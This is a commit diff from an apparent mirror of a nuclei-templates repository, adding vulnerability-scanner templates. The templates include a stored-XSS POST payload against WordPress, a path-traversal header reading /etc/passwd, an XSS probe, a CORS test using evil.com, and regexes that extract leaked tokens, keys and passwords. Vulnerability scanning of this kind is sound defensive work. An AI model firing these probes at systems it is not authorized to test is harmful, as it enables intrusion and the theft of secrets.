daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #86 from Nadino92/master 

improvements across multiple templates and new additions
patch-1
bauthard 2020-05-24 09:16:54 +05:30 committed by GitHub
parent 4e96598a01 c0bf01de1a
commit 0a564274ac
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
14 changed files with 145 additions and 39 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

17
cves/CVE-2018-18069.yaml Normal file
View File

@ -0,0 +1,17 @@
id: CVE-2018-18069
info:
name: Wordpress unauthenticated stored xss
author: nadino
severity: medium
requests:
- method: POST
path:
- "{{BaseURL}}/wp-admin/admin.php"
body: 'icl_post_action=save_theme_localization&locale_file_name_en=EN\"><html xmlns=\"hacked'
matchers:
- type: dsl
dsl:
- 'status_code==302 && contains(set_cookie, "_icl_current_admin_language")'

16
cves/CVE-2018-6389.yaml Normal file
View File

@ -0,0 +1,16 @@
id: CVE-2018-6389
info:
name: Wordpress Load Script
author: nadino
severity: high
requests:
- method: GET
path:
- "{{BaseURL}}/wp-admin/load-scripts.php?load="
matchers:
- type: dsl
dsl:
- 'contains(x_powered_by,"Engine")'
- 'contains(content_type,"javascript")'

4
cves/CVE-2019-5418.yaml
View File

@ -5,13 +5,13 @@ info:
author: omarkurt
severity: medium
#reference: https://github.com/omarkurt/CVE-2019-5418
requests:
- method: GET
path:
- "{{BaseURL}}"
headers:
Accept: ../../../../../../../../etc/passwd{{
Accept: ../../../../../../../../etc/passwd
matchers:
- type: status
status:

1
hosts.txt Normal file
View File

@ -0,0 +1 @@
http://192.168.1.16

32
noisy/general-tokens.yaml Normal file
View File

@ -0,0 +1,32 @@
id: general-tokens
#this will create a huge load of false positive
info:
name: General Tokens
author: nadino
severity: medium
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers:
- type: dsl
dsl:
- 'regex("TOKEN[\\-|_|A-Z0-9]*(\''|\")?(:|=)(\''|\")?[\\-|_|A-Z0-9]{10}",replace(toupper(body)," ",""))' #any TOKEN word
- 'regex("API[\\-|_|A-Z0-9]*(\''|\")?(:|=)(\''|\")?[\\-|_|A-Z0-9]{10}",replace(toupper(body)," ",""))' #any API word
- 'regex("KEY[\\-|_|A-Z0-9]*(\''|\")?(:|=)(\''|\")?[\\-|_|A-Z0-9]{10}",replace(toupper(body)," ",""))' #any KEY word
- 'regex("SECRET[\\-|_|A-Z0-9]*(\''|\")?(:|=)(\''|\")?[\\-|_|A-Z0-9]{10}",replace(toupper(body)," ",""))' #any SECRET word
- 'regex("AUTHORIZATION[\\-|_|A-Z0-9]*(\''|\")?(:|=)(\''|\")?[\\-|_|A-Z0-9]{10}",replace(toupper(body)," ",""))' #any AUTHORIZATION word
- 'regex("PASSWORD[\\-|_|A-Z0-9]*(\''|\")?(:|=)(\''|\")?[\\-|_|A-Z0-9]{10}",replace(toupper(body)," ",""))' #any PASSWORD word
extractors:
- type: regex
part: body
regex:
- "(T|t)(O|o)(K|k)(E|e)(N|n)[\\-|_|A-Za-z0-9]*(\''|\")?( )*(:|=)+( )*(\''|\")?[ 0-9A-Za-z\\-_]+(\''|\")?"
- "(A|a)(P|p)(Ii)[\\-|_|A-Za-z0-9]*(\''|\")?( )*(:|=)( )*(\''|\")?[ 0-9A-Za-z\\-_]+(\''|\")?"
- "(K|k)(E|e)(Y|y)[\\-|_|A-Za-z0-9]*(\''|\")?( )*(:|=)( )*(\''|\")?[ 0-9A-Za-z\\-_]+(\''|\")?"
- "(S|s)(E|e)(C|c)(R|r)(E|e)(T|t)[\\-|_|A-Za-z0-9]*(\''|\")?( )*(:|=)( )*(\''|\")?[ 0-9A-Za-z\\-_]+(\''|\")?"
- "(A|a)(U|u)(T|t)(H|h)(O|o)(R|r)(I|i)(Z|z)(A|a)(T|t)(I|i)(O|o)(N|n)[\\-|_|A-Za-z0-9]*(\''|\")?( )*(:|=)( )*(\''|\")?[ 0-9A-Za-z\\-_]+(\''|\")?"
- "(P|p)(A|a)(S|s)(S|s)(W|w)(O|o)(R|r)(D|d)[\\-|_|A-Za-z0-9]*(\''|\")?( )*(:|=)( )*(\''|\")?[ 0-9A-Za-z\\-_]+(\''|\")?"

19
noisy/general-xss.yaml Normal file
View File

@ -0,0 +1,19 @@
id: General XSS
info:
name: General XSS
author: nadino
severity: medium
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers:
- type: word
words:
- 'a''"><injectable>'
part: body
- type: dsl
dsl:
- 'contains(content_type,"html")'

15
panels/crxde.yaml Normal file
View File

@ -0,0 +1,15 @@
id: crxde
info:
name: CRXDE Lite
author: nadino
severity: medium
requests:
- method: GET
path:
- "{{BaseURL}}/crx/de/index.jsp"
matchers:
- type: word
words:
- "<title>CRXDE Lite</title>"

2
security-misconfiguration/basic-cors.yaml
View File

@ -8,7 +8,7 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/"
- "{{BaseURL}}"
headers:
Origin: https://evil.com
matchers:

46
subdomain-takeover/detect-all-takeovers.yaml
View File

@ -8,7 +8,7 @@ info:
# Update this list with new takeovers matchers
# Do not delete other template files for takeover
# https://github.com/EdOverflow/can-i-take-over-xyz
# You need to claim the cname the subdomain to confirm the takeover.
# You need to claim the cname the subdomain to confirm the takeover.
# Do not report this without claiming the cname.
requests:
@ -22,17 +22,17 @@ requests:
name: pantheon.io
words:
- "The gods are wise, but do not know of the site which you seek."
- type: word
name: aws-s3-bucket
words:
- "The specified bucket does not exist"
- type: word
name: anima
words:
- "If this is your website and you've just created it, try refreshing in a minute"
- type: word
name: ghost
words:
@ -68,6 +68,12 @@ requests:
- ngrok.io not found
- Tunnel *.ngrok.io not found
- type: word
name: tumblr
words:
- Whatever you were looking for doesn't currently exist at this address.
- There's nothing here.
- type: word
name: github
words:
@ -277,57 +283,57 @@ requests:
name: readme
words:
- Project doesnt exist... yet!
- type: word
name: smugmug
words:
- '{"text":"Page Not Found"'
- type: word
name: airee
words:
- Ошибка 402. Сервис Айри.рф не оплачен
- type: word
name: kinsta
words:
- No Site For Domain
- type: word
name: launchrock
words:
- It looks like you may have taken a wrong turn somewhere. Don't worry...it happens
to all of us.
- type: word
name: Strikingly
words:
- But if you're looking to build your own website
- you've come to the right place.
- type: word
name: HatenaBlog
words:
- 404 Blog is not found
- Sorry, we can't find the page you're looking for.
- type: word
name: wufoo
words:
- Profile not found
- Hmmm....something is not right.
- type: word
name: hubspot
words:
- Domain not found
- does not exist in our system
- type: word
name: jazzhr
words:
- This account no longer active
- type: word
name: smartjob
words:
@ -339,19 +345,19 @@ requests:
name: Uptimerobot
regex:
- "^page not found$"
- type: word
name: agile
name: agile
words:
- Sorry, this page is no longer available.
- type: word
name: pingdom
name: pingdom
words:
- Public Report Not Activated
- This public report page has not been activated by the user
- type: word
name: zendesk
name: zendesk
words:
- this help center no longer exists

22
tokens/amazon-mws-auth-token-value.yaml
View File

@ -1,22 +1,22 @@
id: amazon-mws-auth-token-value
info:
info:
author: puzzlepeaches
name: "Amazon MWS Auth Token"
severity: medium
requests:
-
extractors:
-
requests:
-
extractors:
-
part: body
regex:
regex:
- "amzn\\.mws\\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}"
type: regex
matchers:
-
matchers:
-
part: body
regex:
regex:
- "amzn\\.mws\\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}"
type: regex
method: GET
path:
- "{{BaseURL}}/"
path:
- "{{BaseURL}}"

4
tokens/aws-access-key-value.yaml
View File

@ -8,7 +8,7 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/"
- "{{BaseURL}}"
matchers:
- type: regex
part: body
@ -18,4 +18,4 @@ requests:
- type: regex
part: body
regex:
- "(A3T[A-Z0-9]|AKIA|AGPA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}"
- "(A3T[A-Z0-9]|AKIA|AGPA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}"

2
tokens/google-api-key.yaml
View File

@ -8,7 +8,7 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/"
- "{{BaseURL}}"
matchers:
- type: regex
part: body

2
tokens/mailchimp-api-key.yaml
View File

@ -8,7 +8,7 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/"
- "{{BaseURL}}"
matchers:
- type: regex
part: body

2
tokens/slack-access-token.yaml
View File

@ -11,7 +11,7 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/"
- "{{BaseURL}}"
matchers:
- type: regex
part: body